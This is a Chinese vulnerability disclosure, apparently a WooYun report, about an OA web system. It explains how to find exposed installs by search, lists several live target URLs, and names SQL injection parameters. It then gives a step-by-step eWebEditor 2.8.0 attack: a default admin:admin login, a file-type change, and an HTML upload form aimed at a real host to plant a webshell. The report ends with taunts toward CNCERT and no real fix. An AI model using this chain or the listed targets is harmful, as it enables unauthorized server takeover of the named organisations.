1.先证明其通用性
搜索引擎搜索“首次使用请先点击安装”即可找到部分案例,
举例:
http://oa.syc.com.cn/OA/index/index.aspx
http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx
http://221.199.203.230:9001/dsoa/index/index.aspx
http://180.166.56.106/dsoa/index/index0.aspx
http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx
2.SQL注入
上次的注射点在/help/HelpShowTip.aspx?helpid=1
这次又发现注射点help/HelpShow.aspx?id=1
比如,http://oa.syc.com.cn/OA/help/HelpShow.aspx?id=1
证明图略。
3.限制关键词
该OA使用eWebEditor 2.8.0
比如,访问http://oa.syc.com.cn/OA/ewebeditor/admin_login.asp,以默认admin:admin登陆,修改样式,记下样式名称,比如“s_exampleremote”,在“其它类型”中添加“aaspsp”,
提交,
再使用如下exp:
<HTML> <HEAD> <meta charset="utf-8" /> <TITLE>限制关键词</TITLE> </head> <body> <form action="http://oa.syc.com.cn/OA/ewebeditor/upload.asp?action=save&type=FILE&style=s_exampleremote" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value"> <input type=hidden name=originalfile value=""> <input type=submit value="提交"> </form> </body> </html>
随后于“上传文件管理”中找到刚才上传的webshell,
Game Over
4.
-Why not dig a little deeper?
-Nah,no need for that.
漏洞证明:
You just saw that, didn't you, cncert?
修复方案:
Fix it right away.
C'mon, man, you guys gave me just 11rank for WooYun-2014-55573?
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;